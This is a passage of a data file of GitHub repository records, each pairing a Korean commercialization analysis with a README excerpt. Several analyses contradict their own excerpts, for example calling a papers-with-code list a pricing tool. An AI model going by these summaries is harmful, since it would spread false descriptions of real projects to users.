library.\n\n```python\n>>> import requests\n>>> r = requests.get('https://httpbin.org/basic-auth/user/pass', auth=('user', 'pass'))\n>>> r.status_code\n200\n>>> r.headers['content-type']\n'application/json; charset=utf8'\n>>> r.encoding\n'utf-8'\n>>> r.text\n'{\"authenticated\": true, ...'\n>>> r.json()\n{'authenticated': True, ...}\n```\n\nRequests allows you to send HTTP/1.1 requests extremel","composite_score":0.4,"license_safety_tag":"safe"},{"name":"apache/incubator-dubbo","github_url":"https://github.com/apache/incubator-dubbo","stars":13,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# Apache Dubbo 저장소 분석\n\n## 왜 보물인가\n여러 컴퓨터가 서로 통신하며 일하는 대규모 시스템을 만들 때 필요한 기본 틀을 제공하는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 수백만 고객의 주문·결제·배송 시스템을 안정적으로 연결하는 백엔드 인프라\n2. **금융 회사 내부 시스템**: 은행의 여러 부서","readme_excerpt":"\n# Apache Dubbo Project\n\n[![Build and Test For PR](https://github.com/apache/dubbo/actions/workflows/build-and-test-pr.yml/badge.svg)](https://github.com/apache/dubbo/actions/workflows/build-and-test-pr.yml)\n[![Codecov](https://codecov.io/gh/apache/dubbo/branch/3.3/graph/badge.svg)](https://codecov.io/gh/apache/dubbo)\n[![Maven](https://img.shields.io/github/v/release/apache/dubbo.svg?sort=semver)](https://github.com/apache/dubbo/releases)\n[![License](https://img.shields.io/github/license/apache/dubbo.svg)](https://github.com/apache/dubbo/blob/3.3/LICENSE)\n[![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/apache/dubbo.svg)](http://isitmaintained.com/project/apache/dubbo)\n[![Percentage of issues still open](http://isitmaintained.com/badge/open/apache/dubbo.svg)](http://isitmaintained.com/project/apache/dubbo)\n\nApache Dubbo is a powerful and user-friendly Web and RPC framework. It supports multiple language implementations such as Java, [Go](https://github.co","composite_score":0.4,"license_safety_tag":"safe"},{"name":"ionic-team/ionic","github_url":"https://github.com/ionic-team/ionic","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Ionic 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱을 한 번의 개발로 iOS와 안드로이드 모두에 배포할 수 있는 기술로, 앱 개발 비용을 획기적으로 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 스타트업 대상 앱 개발 SaaS**\n- 기술 지식 없는 창업자들이 저비용으로 모바일 앱을 만들 수 있는 웹 기반 앱 빌더 플랫폼 제공\n\n**2.","readme_excerpt":"<p align=\"center\">\n  <a href=\"#\">\n    <img alt=\"Ionic\" src=\"https://github.com/ionic-team/ionic-framework/blob/main/.github/assets/logo.png?raw=true\" width=\"60\" />\n  </a>\n</p>\n\n<h1 align=\"center\">\n  Ionic\n</h1>\n\n<p align=\"center\">\n  Ionic is an open source app development toolkit for building modern, fast, top-quality cross-platform native and Progressive Web Apps from a single codebase with JavaScript and the Web.\n</p>\n<p align=\"center\">\n  Ionic is based on <a href=\"https://www.webcomponents.org/introduction\">Web Components</a>, which enables significant performance, usability, and feature improvements alongside support for popular web frameworks like <a href=\"https://angular.io/\">Angular</a>, <a href=\"https://reactjs.com/\">React</a>, and <a href=\"https://vuejs.org/\">Vue</a>.\n\n</p>\n\n<p align=\"center\">\n  <a href=\"https://github.com/ionic-team/ionic-framework/blob/main/LICENSE\">\n    <img src=\"https://img.shields.io/badge/license-MIT-blue.svg\" alt=\"Ionic Framework is released under the M","composite_score":0.4,"license_safety_tag":"safe"},{"name":"fashiontec/fashion-robot","github_url":"https://github.com/fashiontec/fashion-robot","stars":12,"language":"","license":"GPL-3.0","abandonment_months":25,"description":"# Fashion Robot 저장소 분석\n\n## 왜 보물인가\n패션 산업의 반복적인 작업(상품 분류, 이미지 처리, 재고 관리 등)을 자동화하는 로봇 시스템으로, 중소 의류 회사들의 생산성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 온라인 쇼핑몰 운영자들을 위한 월간 구독형 \"상품 자동 분류 및 이미지 태깅 서비","readme_excerpt":"Pattern making program\nAuthor Roman Telezhynskyi <dismine(at)gmail.com>\nCopyright (C) 2013-2019 Valentina project  \nValentina Web page: https://valentinaproject.bitbucket.io/\nWiki: https://wiki.valentinaproject.org    \nValentina main repository: https://bitbucket.org/dismine/valentina/overview    \nForum http://valentinaproject.forumotion.me/    \nPPA for Ubuntu (develop): https://launchpad.net/~dismine/+archive/valentina-dev    \nHelp translate https://www.transifex.com/organization/valentina    \n\nValentina\n==========\nValentina is a cross-platform patternmaking program which allows designers \nto create and model patterns of clothing. This software allows pattern \ncreation, using either standard sizing tables or an individual’s set of \nmeasurements. It blends new technologies with traditional methods to create \na unique pattern making tool. \n\nCompiling Valentina\n====================\nPrerequisites:   \n   * Qt 5.4.0 or later (On Unix development packages needed)   \n   * mercurial (only for ","composite_score":0.3996,"license_safety_tag":"restricted"},{"name":"elaine-zheng/summer2020internships","github_url":"https://github.com/elaine-zheng/summer2020internships","stars":8,"language":"Python","license":"unknown","abandonment_months":68,"description":"","readme_excerpt":"\n# Summer 2020 Internships\n**Unfortunately, this is no longer being updated as of 3/1/2020. This list is by no means comprehensive and there are definitely still opportunities out there! Best of luck everyone**\n\nKeep track of internships for Summer 2020 for undergraduates interested in tech, SWE, and related fields. Never too early to get started in your search! Thanks to [christine-hu](https://github.com/christine-hu/summer-2019-internships) who made a similar document for the 2019 season for formatting inspiration. Utilize the Python Script to receive an outputted Excel-Friendly version\n\n> Sites used to find internships include LinkedIn, Indeed, Glassdoor, and AngelList (startups).\nSummer 2019 Tech Internships!\n> Positions are geared towards Computer Science majors who may have intersectional interests such as Design, > Finance, Research, etc. All positions are open to anyone enrolled in a Bachelor's degree program.\n\n\nTo contribute:\n 1. Fork repository\n 2. Edit README.md *(I used the","composite_score":0.3996,"license_safety_tag":"unknown"},{"name":"fossasia/loklak.net","github_url":"https://github.com/fossasia/loklak.net","stars":12,"language":"HTML","license":"LGPL-3.0","abandonment_months":25,"description":"# fossasia/loklak.net 상업화 분석\n\n## 왜 보물인가\n소셜 미디어와 뉴스에서 정보를 자동으로 수집하고 정리해주는 '똑똑한 정보 수집 도구'입니다.\n\n## 어디에 쓸 수 있나\n1. **시장 조사 서비스**: 경쟁사 뉴스, 산업 트렌드를 자동으로 모니터링하는 구독형 웹 서비스\n2. **기업 내부 도구**: PR팀이 자사 브랜드 언급을 실시간으","readme_excerpt":"","composite_score":0.3995,"license_safety_tag":"restricted"},{"name":"loklak/sphinx_loklak_theme","github_url":"https://github.com/loklak/sphinx_loklak_theme","stars":12,"language":"HTML","license":"GPL-3.0","abandonment_months":25,"description":"# loklak/sphinx_loklak_theme 평가\n\n## 왜 보물인가\n검색 엔진과 소셜 미디어 데이터를 수집하는 loklak 프로젝트의 문서를 보기 좋게 만들어주는 디자인 템플릿으로, 기술 프로젝트를 전문적으로 보이게 꾸미는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 기업의 검색·분석 솔루션 문서를 회사 브랜드에 맞게 꾸미","readme_excerpt":"sphinx_susiai_theme\n=====================\n\n.. image:: https://travis-ci.org/fossasia/sphinx_susai_theme.svg?branch=master\n    :target: https://travis-ci.org/fossasia/sphinx_susai_theme\n\nOfficial material design based Sphinx theme for SUSI AI\n\nInstallation\n------------\n\nDownload the package or add it to your `requirements.txt`\n\n::\n\n    pip install sphinx_susai_theme\n\nIn your conf.py file:\n\n::\n\n    html_theme = \"sphinx_susiai_theme\"\n","composite_score":0.3995,"license_safety_tag":"restricted"},{"name":"fbsamples/f8app","github_url":"https://github.com/fbsamples/f8app","stars":10,"language":"JavaScript","license":"NOASSERTION","abandonment_months":35,"description":"# fbsamples/f8app 분석 보고서\n\n## 왜 보물인가\n페이스북이 만든 컨퍼런스 앱으로, 대규모 행사를 온라인으로 관리하고 참석자들과 상호작용하는 방법을 보여주는 실제 사례입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 컨퍼런스·세미나 참석자 관리 플랫폼으로 출시 (일정, 스피커, 네트워킹 기능 포함)\n2. **내부 업무 도","readme_excerpt":"# F8 App 2017\n\nThis is the entire source code of the official [F8](https://fbf8.com/) app of 2017, available on [Google Play](https://play.google.com/store/apps/details?id=com.facebook.f8) and the [App Store](https://itunes.apple.com/us/app/f8/id853467066).\n\n<img src=\".github/screenshot-app@2x.png\" width=\"800\">\n\n\n## How We Build It\n\nWe've created a series of tutorials at http://makeitopen.com/ that explain how we built the app, and that dive into how we used React Native, Redux, Relay, GraphQL, and more.\n\nCheck out how to set the app up for local development [here](http://makeitopen.com/docs/en/1-A1-local-setup.html)!\n","composite_score":0.3992,"license_safety_tag":"unknown"},{"name":"zurb/foundation-sites","github_url":"https://github.com/zurb/foundation-sites","stars":10,"language":"HTML","license":"mit","abandonment_months":16,"description":"# Foundation Sites 기술 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 기본 설계도(디자인 시스템)를 제공하여 개발자들이 처음부터 만들지 않고 빠르게 사용할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 급성장 초기 스타트업이 빠르게 관리 대시보드를 구축해야 할 때 Foundation을 구독형으로 제공\n-","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://get.foundation/\">\n    <img src=\"https://user-images.githubusercontent.com/9939075/38782856-2a64a43e-40fa-11e8-89cd-e873af03b3c4.png\" alt=\"Foundation for Sites 6\" width=\"448px\" style=\"max-width:100%;\"/>\n  </a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://get.foundation/sites/docs/installation.html\"><b>Install</b></a>\n  | <a href=\"https://get.foundation/sites/docs/\">Documentation</a>\n  | <a href=\"https://github.com/foundation/foundation-sites/releases\">Releases</a>\n  | <a href=\"CONTRIBUTING.md\">Contributing</a>\n</p>\n\n---\n\n[![Build Status](https://github.com/foundation/foundation-sites/workflows/CI/badge.svg)](https://github.com/foundation/foundation-sites/actions?workflow=CI)\n[![npm version](https://badge.fury.io/js/foundation-sites.svg)](https://badge.fury.io/js/foundation-sites)\n[![jsDelivr Hits](https://data.jsdelivr.com/v1/package/npm/foundation-sites/badge?style=rounded)](https://www.jsdelivr.com/package/npm/foundation-sites)\n[![Netlify Status](h","composite_score":0.3981,"license_safety_tag":"safe"},{"name":"lgvalle/Material-Animations","github_url":"https://github.com/lgvalle/Material-Animations","stars":13,"language":"Java","license":"mit","abandonment_months":87,"description":"# Material-Animations 분석 보고서\n\n## 왜 보물인가\n앱이나 웹사이트에서 버튼을 클릭하면 부드럽게 움직이는 효과를 쉽게 만들 수 있는 도구로, 사용자 경험을 한 단계 업그레이드시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 프로젝트 관리 앱이나 설계 도구에서 버튼과 메뉴가 자연스럽게 움직이는 인터페이스 제공\n","readme_excerpt":"# UNMAINTAINED\nNo maintainance is intended. \nThe content is still valid as a reference but it won't contain the latest new stuff\n\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-Material--Animations-brightgreen.svg?style=flat)](http://android-arsenal.com/details/3/1880)\n\n[Android Transition Framework][transition-framework] can be used for **three** main things:\n\n1. Animate activity layout content when transitioning from one activity to another.\n2. Animate shared elements (Hero views) in transitions between activities.\n3. Animate view changes within same activity.\n\n\n## 1. Transitions between Activities\n\nAnimate existing activity layout **content**\n\n![A Start B][transition_a_to_b]\n\nWhen transitioning from `Activity A` to `Activity B` content layout is animated according to defined transition. There are three predefined transitions available on `android.transition.Transition` you can use: **Explode**, **Slide** and **Fade**. \nAll these transitions track changes to the v","composite_score":0.3981,"license_safety_tag":"safe"},{"name":"lipangit/JiaoZiVideoPlayer","github_url":"https://github.com/lipangit/JiaoZiVideoPlayer","stars":14,"language":"Java","license":"mit","abandonment_months":69,"description":"# JiaoZiVideoPlayer 보물 분석\n\n## 왜 보물인가\n동영상을 재생하는 기능을 쉽게 만들 수 있는 도구로, 앱이나 웹사이트에 영상 플레이어를 빠르게 추가하고 싶은 개발자들에게 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 동영상 강의 플랫폼이 이 플레이어를 기본 기능으로 탑재하여 수강생에게 제공\n- **내부 업무 도구**:","readme_excerpt":"<a href=\"https://github.com/lipangit/JiaoZiVideoPlayer\" target=\"_blank\"><p align=\"center\"><img src=\"https://user-images.githubusercontent.com/2038071/42033014-0bf1c0b0-7b0e-11e8-811d-7639bcd294eb.png\" alt=\"JiaoZiVideoPlayer\" height=\"150px\"></p></a>\n--\n\nMove to [Jzvd/JiaoZiVideoPlayer](https://github.com/Jzvd/JiaoZiVideoPlayer)\n\nHighly customizable Android video framework\n","composite_score":0.3977,"license_safety_tag":"safe"},{"name":"realm/realm-cocoa","github_url":"https://github.com/realm/realm-cocoa","stars":6,"language":"Objective-C","license":"Apache-2.0","abandonment_months":2,"description":"# Realm Cocoa 저장소 분석\n\n## 왜 보물인가\n아이폰·맥에서 앱이 데이터를 빠르고 안전하게 저장·동기화할 수 있는 핵심 기술로, 수백만 사용자의 앱 성능을 좌우하는 중요한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 앱 개발사가 구독형으로 데이터 동기화 솔루션을 제공하는 플랫폼\n2. **내부 업무 도구**: 은행·","readme_excerpt":"<picture>\n    <source srcset=\"./media/logo-dark.svg\" media=\"(prefers-color-scheme: dark)\" alt=\"realm\">\n    <img src=\"./media/logo.svg\" alt=\"realm\">\n</picture>\n\n# About Realm Database\n\nRealm is a mobile database that runs directly inside phones, tablets or wearables.\nThis repository holds the source code for the iOS, macOS, tvOS & watchOS versions of Realm Swift & Realm Objective-C.\n\n## Why Use Realm\n\n* **Intuitive to Developers:** Realm’s object-oriented data model is simple to learn, doesn’t need an ORM, and lets you write less code.\n* **Built for Mobile:** Realm is fully-featured, lightweight, and efficiently uses memory, disk space, and battery life.\n* **Designed for Offline Use:** Realm’s local database persists data on-disk, so apps work as well offline as they do online.\n\n## Object-Oriented: Streamline Your Code\n\nRealm was built for mobile developers, with simplicity in mind. The idiomatic, object-oriented data model can save you thousands of lines of code.\n\n```swift\n// Define yo","composite_score":0.3977,"license_safety_tag":"safe"},{"name":"zziz/pwc","github_url":"https://github.com/zziz/pwc","stars":7,"language":"","license":"unknown","abandonment_months":77,"description":"# zziz/pwc 저장소 분석\n\n## 왜 보물인가\n이 프로젝트는 가격 책정과 비용 관리를 자동화하는 도구로, 중소 기업이 복잡한 가격 결정을 쉽게 할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 유통업체나 온라인 쇼핑몰이 상품 가격을 자동으로 계산하고 관리하는 월 구독 서비스\n- **내부 업무 도구**: 기업의 재무팀","readme_excerpt":"<div align=\"left\">\n<h1>\n    <img alt=\"HEADER\" src=\"src/asset/header.jpg\" width=\"900\" height=\"300\"></img>\n</h1>\n\n| [2018](#2018) | [2017](#2017) | [2016](#2016) | [2015](#2015) | [2014](#2014) | [2013](#2013) | 2012 | 2011 | 2010 | 2009 | 2008 | [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Papers%20with%20code.%20Sorted%20by%20stars.%20Updated%20weekly.%20&url=https://github.com/zziz/pwc&via=fvzaur&hashtags=machinelearning,paper,code,github) | [Suggestions](https://github.com/zziz/pwc/issues/1) |    \n|:-------:|:-------:|:-------:|:-------:|:-------:|:-------:|:-------:|:-------:|:-------:|:-------:|:-------:|:-------:|:-------:|\n\nThis work is in continuous progress and update. We are adding new PWC everyday! Tweet me [@fvzaur](https://twitter.com/fvzaur)   \nUse [this](https://github.com/zziz/pwc/issues/11) thread to request us your favorite conference to be added to our watchlist and to PWC list.   \n#### Weekly up","composite_score":0.3976,"license_safety_tag":"unknown"},{"name":"FrancescoXX/4c-site","github_url":"https://github.com/FrancescoXX/4c-site","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":19,"description":"# 4c-site 프로젝트 분석\n\n## 왜 보물인가\n작은 규모지만 꾸준히 관리되는 웹 프로젝트로, MIT 라이선스의 자유로운 활용과 최근 업데이트(2024년 10월)가 시사하는 실제 사용 가능성이 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 기업의 팀 협업이나 데이터 관리를 위한 커스텀 웹 애플리케이션으로 활용\n- **SaaS 서비스*","readme_excerpt":"# 4C (The Cool Community of Content Creators)\n\nImagine **The Cool Community For Content Creators** or **4C**, as a chill coffee shop (cooler even 💣). An inclusive and helpful environment, where we help content creators reach their goals by sharing experiences.\n\nGain access to exclusive talks/workshops with popular content creators, and hence, opportunities to collaborate.\n\nWe have games too! 🎮\n\n## 👋 Join Us :\nJoin our amazing community on Discord and Twitter.\n\n<a href=\"https://discord.com/invite/cRjhjFRRre\"><img src=\"https://cdn.worldvectorlogo.com/logos/discord-6.svg\" title=\"Discord\" alt=\"Discord Community\" width=\"40\"/></a><a href=\"https://twitter.com/4ccommunityhq\"><img src=\"https://worldvectorlogo.com/logo/twitter-logo-2\" title=\"Twitter\" alt=\"Twitter Account\" width=\"40\"/></a>\n\n<br>\n<img src=\"https://raw.githubusercontent.com/FrancescoXX/4c-site/main/src/assets/banner.jpg\" alt=\"4C logo\">\n\n## 📷 Website overview\n\nThis repository concerns the 4C community [website](https://www.4c.rocks/","composite_score":0.3971,"license_safety_tag":"safe"},{"name":"HeroTransitions/Hero","github_url":"https://github.com/HeroTransitions/Hero","stars":5,"language":"Swift","license":"MIT","abandonment_months":16,"description":"# Hero - 화면 전환 효과 라이브러리 분석\n\n## 왜 보물인가\n앱이나 웹사이트에서 화면이 자연스럽게 넘어가도록 만드는 기술로, 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 개발 SaaS**: 개발자들이 쉽게 화면 전환 효과를 추가할 수 있는 온라인 도구로 월 구독 판매\n2. **전자상거래 플랫폼**: 상품","readme_excerpt":"<img src=\"https://cdn.rawgit.com/lkzhao/Hero/427d5f2/Resources/Hero.svg\" width=\"388\"/>\n\n**Hero** is a library for building iOS view controller transitions. It provides a declarative layer on top of the UIKit's cumbersome transition APIs—making custom transitions an easy task for developers.\n\n[![Carthage compatible](https://img.shields.io/badge/Carthage-Compatible-brightgreen.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![Accio supported](https://img.shields.io/badge/Accio-supported-0A7CF5.svg?style=flat)](https://github.com/JamitLabs/Accio)\n[![codecov](https://codecov.io/gh/HeroTransitions/Hero/branch/develop/graph/badge.svg)](https://codecov.io/gh/HeroTransitions/Hero)\n[![Version](https://img.shields.io/cocoapods/v/Hero.svg?style=flat)](http://cocoapods.org/pods/Hero)\n[![License](https://img.shields.io/cocoapods/l/Hero.svg?style=flat)](https://github.com/lkzhao/Hero/blob/master/LICENSE?raw=true)\n![Xcode 10.0+](https://img.shields.io/badge/Xcode-10.0%2B-blue.svg)\n![iOS 10.0+","composite_score":0.3969,"license_safety_tag":"safe"},{"name":"crawlab-team/crawlab","github_url":"https://github.com/crawlab-team/crawlab","stars":14,"language":"Go","license":"BSD-3-Clause","abandonment_months":3,"description":"# Crawlab 상용화 분석\n\n## 왜 보물인가\n웹사이트에서 자동으로 데이터를 수집하는 작업을 누구나 쉽게 만들고 관리할 수 있는 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 시장 조사 자동화 플랫폼**\n- 경쟁사 가격, 상품 정보를 매일 자동으로 수집하여 기업에 제공하는 구독 서비스\n\n**2. 내부 업무 도구: 대규모 유통 기업","readme_excerpt":"# Crawlab\n\n<p>\n  <a href=\"https://github.com/crawlab-team/crawlab/actions/workflows/docker-crawlab.yml\" target=\"_blank\">\n    <img src=\"https://github.com/crawlab-team/crawlab/workflows/Docker%20Image%20CI:%20crawlab/badge.svg\">\n  </a>\n  <a href=\"https://github.com/crawlab-team/crawlab/releases\" target=\"_blank\">\n    <img src=\"https://img.shields.io/github/release/crawlab-team/crawlab.svg?logo=github\">\n  </a>\n  <a href=\"https://github.com/crawlab-team/crawlab/commits/main\" target=\"_blank\">\n    <img src=\"https://img.shields.io/github/last-commit/crawlab-team/crawlab.svg\">\n  </a>\n  <a href=\"https://github.com/crawlab-team/crawlab/issues?q=is%3Aissue+is%3Aopen+label%3Abug\" target=\"_blank\">\n    <img src=\"https://img.shields.io/github/issues/crawlab-team/crawlab/bug.svg?label=bugs&color=red\">\n  </a>\n  <a href=\"https://github.com/crawlab-team/crawlab/issues?q=is%3Aissue+is%3Aopen+label%3Aenhancement\" target=\"_blank\">\n    <img src=\"https://img.shields.io/github/issues/crawlab-team/crawlab/enhan","composite_score":0.3969,"license_safety_tag":"safe"},{"name":"H07000223/FlycoTabLayout","github_url":"https://github.com/H07000223/FlycoTabLayout","stars":11,"language":"Java","license":"mit","abandonment_months":36,"description":"# FlycoTabLayout 분석 보고서\n\n## 왜 보물인가\n휴대폰 앱의 탭(탭) 메뉴를 아름답고 매끄럽게 만들어주는 디자인 도구로, 앱 개발자들이 사용하기 쉽게 미리 만들어놓은 솔루션입니다.\n\n## 어디에 쓸 수 있나\n**1. 앱 개발 플랫폼 SaaS**\n- 개발자들이 코드 없이 탭 메뉴를 드래그-드롭으로 만들 수 있는 구독형 서비스로 제공\n\n**2. ","readme_excerpt":"# FlycoTabLayout\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-FlycoTabLayout-green.svg?style=true)](https://android-arsenal.com/details/1/2756)\n#### [中文版](https://github.com/H07000223/FlycoTabLayout/blob/master/README_CN.md)\nAn Android TabLayout Lib has 3 kinds of TabLayout at present.\n\n* SlidingTabLayout: deeply modified from [PagerSlidingTabStrip](https://github.com/jpardogo/PagerSlidingTabStrip).\n    * new added attribute\n    * new added kinds of indicators\n    * new added unread msg tip\n    * new added method for convenience\n    \n    ```java\n        /** no need to set titles in adapter */\n        public void setViewPager(ViewPager vp, String[] titles)\n        \n        /** no need to initialize even adapter */\n        public void setViewPager(ViewPager vp, String[] titles, FragmentActivity fa, ArrayList<Fragment> fragments) \n    ```\n\n* CommonTabLayout:unlike SlidingTabLayout's dependence on ViewPager,it is a tabLayout without dependence on ViewPager and \ncan be","composite_score":0.3968,"license_safety_tag":"safe"},{"name":"fex-team/ueditor","github_url":"https://github.com/fex-team/ueditor","stars":5,"language":"JavaScript","license":"mit","abandonment_months":41,"description":"# UEditor 상용화 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 사용자들이 글을 쉽게 작성하고 편집할 수 있도록 해주는 핵심 도구로, 많은 온라인 서비스에서 필수적으로 필요합니다.\n\n## 어디에 쓸 수 있나\n\n1. **콘텐츠 관리 SaaS**: 블로그, 뉴스레터, 문서 작성 플랫폼에 내장하여 사용자가 쉽게 글을 작성하게 해주는 서비스\n2. **기업 내","readme_excerpt":"Get Started\n=====\n\n> 鉴于目前 ISSUE 较多而维护时间较少，且在进行后续的版本更新，目前暂时关闭 ISSUE，若社区有人跟进，欢迎和我们联系。重复的问题，请参阅常见问题的 [FAQ Wiki](https://github.com/fex-team/ueditor/wiki/FAQ)。\n\n## 重要安全通告：\n\n1. commons-fileupload-1.3.1.jar 存在漏洞可能会导致 ddos，源代码中已经修改，使用老版本的用户，强烈推荐升级 commons-fileupload.jar 至最新版本。（2018-04-09）.\n2. UEditor 所提供的所有后端代码都仅为 DEMO 作用，切不可直接使用到生产环境中，目前已知 php 的代码会存在 ssrf 及文件包含漏洞，因此不再提供。\n\n## ueditor富文本编辑器介绍\n\nUEditor是由百度web前端研发部开发所见即所得富文本web编辑器，具有轻量，可定制，注重用户体验等特点，开源基于MIT协议，允许自由使用和修改代码。\n\n## 1 入门部署和体验\n\n### 1.1 下载编辑器\n\n1. `git clone ` 仓库\n2. `npm install` 安装依赖（如果没有安装 grunt , 请先在全局安装 grunt）\n3. 在终端执行 `grunt default`\n\n### 1.2 创建demo文件\n解压下载的包，在解压后的目录创建demo.html文件，填入下面的html代码\n\n```html\n<!DOCTYPE HTML>\n<html lang=\"en-US\">\n<head>\n\t<meta charset=\"UTF-8\">\n\t<title>ueditor demo</title>\n</head>\n<body>\n\t<!-- 加载编辑器的容器 -->\n\t<script id=\"container\" name=\"content\" type=\"text/plain\">这里写你的初始化内容</script>\n\t<!-- 配置文件 -->\n\t<script type=\"text/javascript\" src=\"ueditor.config.js\"></script>\n\t<!-- 编辑器源码文件 -->\n\t<script type=\"text/javascript\" sr","composite_score":0.3967,"license_safety_tag":"safe"},{"name":"linkedin/kafka-monitor","github_url":"https://github.com/linkedin/kafka-monitor","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":15,"description":"# LinkedIn Kafka Monitor 분석\n\n## 왜 보물인가\n회사의 메시지 전송 시스템이 제대로 작동하는지 자동으로 감시하고 문제를 빨리 찾아주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 실시간 데이터 처리가 필요한 클라우드 서비스 업체들에게 모니터링 기능을 월별 구독으로 제공\n2. **내부 업무 도구**: 대규모 회","readme_excerpt":"<p align=\"center\">\n  <img src=\"/docs/images/xinfra_monitor.png\" width=\"510\"/>\n</p>\n\n# Xinfra Monitor\n[![Build Status](https://travis-ci.org/linkedin/kafka-monitor.svg?branch=master)](https://travis-ci.org/linkedin/kafka-monitor)\n![Greetings](https://github.com/linkedin/kafka-monitor/workflows/Greetings/badge.svg)\n![Mark stale issues and pull requests](https://github.com/linkedin/kafka-monitor/workflows/Mark%20stale%20issues%20and%20pull%20requests/badge.svg)\n![Pull Request Labeler](https://github.com/linkedin/kafka-monitor/workflows/Pull%20Request%20Labeler/badge.svg)\n\nXinfra Monitor (formerly Kafka Monitor) is a framework to implement and execute long-running kafka\nsystem tests in a real cluster. It complements Kafka’s existing system\ntests by capturing potential bugs or regressions that are only likely to occur\nafter prolonged period of time or with low probability. Moreover, it allows you to monitor Kafka\ncluster using end-to-end pipelines to obtain a number of derived vital stats\ns","composite_score":0.3967,"license_safety_tag":"safe"},{"name":"thoughtbot/paperclip","github_url":"https://github.com/thoughtbot/paperclip","stars":6,"language":"Ruby","license":"NOASSERTION","abandonment_months":35,"description":"# Paperclip 저장소 분석\n\n## 왜 보물인가\n웹사이트에 사진이나 파일을 쉽게 업로드하고 관리할 수 있게 해주는 오래된 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자가 프로필 사진을 업로드하는 소셜 플랫폼이나 포트폴리오 사이트\n2. **내부 업무 도구**: 회사 직원들이 계약서나 영수증 같은 문서를 저장하는 관리 ","readme_excerpt":"Paperclip\n=========\n\n# Deprecated\n\n**[Paperclip is deprecated]**.\n\nFor new projects, we recommend Rails' own [ActiveStorage].\n\nFor existing projects, please consult and contribute to the migration guide,\navailable [in English], [en español], and as [a video] recorded at RailsConf\n2019. You may also prefer [an alternative migration tutorial used by\nDoorkeeper][].\n\nAlternatively, for existing projects, [Kreeti] is maintaining [kt-paperclip],\nan ongoing [fork of Paperclip].\n\nWe will leave the Issues open as a discussion forum _only_. We do _not_\nguarantee a response from us in the Issues. All bug reports should go to\nkt-paperclip.\n\nWe are no longer accepting pull requests _except_ pull requests against the\nmigration guide. All other pull requests will be closed without merging.\n\n[Paperclip is deprecated]: https://robots.thoughtbot.com/closing-the-trombone\n[ActiveStorage]: http://guides.rubyonrails.org/active_storage_overview.html\n[in English]: https://github.com/thoughtbot/paperclip/blob/","composite_score":0.3967,"license_safety_tag":"unknown"},{"name":"dangrossman/bootstrap-daterangepicker","github_url":"https://github.com/dangrossman/bootstrap-daterangepicker","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":22,"description":"# Bootstrap DateRangePicker 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 사용자가 날짜 범위를 쉽게 선택할 수 있게 해주는 완성된 도구로, 많은 기업 서비스에서 필수적으로 필요한 기능입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (데이터 분석 플랫폼)**\n- 고객이 특정 기간의 판매액, 방문자 수를 조회할 때 날짜 선택","readme_excerpt":"# Date Range Picker\n\n![Improvely.com](https://i.imgur.com/UTRlaar.png)\n\nThis date range picker component creates a dropdown menu from which a user can\nselect a range of dates. I created it while building the UI for [Improvely](http://www.improvely.com), \nwhich needed a way to select date ranges for reports.\n\nFeatures include limiting the selectable date range, localizable strings and date formats,\na single date picker mode, a time picker, and predefined date ranges.\n\n## [Documentation and Live Usage Examples](http://www.daterangepicker.com)\n\n## [See It In a Live Application](https://awio.iljmp.com/5/drpdemogh)\n\n## License\n\nThe MIT License (MIT)\n\nCopyright (c) 2012-2020 Dan Grossman\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\nco","composite_score":0.3965,"license_safety_tag":"unknown"},{"name":"iOS-Goodies/iOS-Goodies","github_url":"https://github.com/iOS-Goodies/iOS-Goodies","stars":8,"language":"","license":"unknown","abandonment_months":31,"description":"# iOS-Goodies 저장소 분석\n\n## 왜 보물인가\niPhone 앱 개발자들이 자주 찾는 유용한 개발 도구와 자료들을 한곳에 모아놓은 큐레이션 모음집입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: iPhone 앱 개발자 커뮤니티를 위한 월간 뉴스레터 또는 구독 정보 서비스\n2. **내부 업무 도구**: 개발 회사의 신입 교육용 자료 ","readme_excerpt":"# iOS Goodies\n\n## iOS Goodies is currently on pause, at least until the end of 2021. Please don't submit new articles for the next edition.\n\n**iOS Goodies** is a weekly newsletter containing the 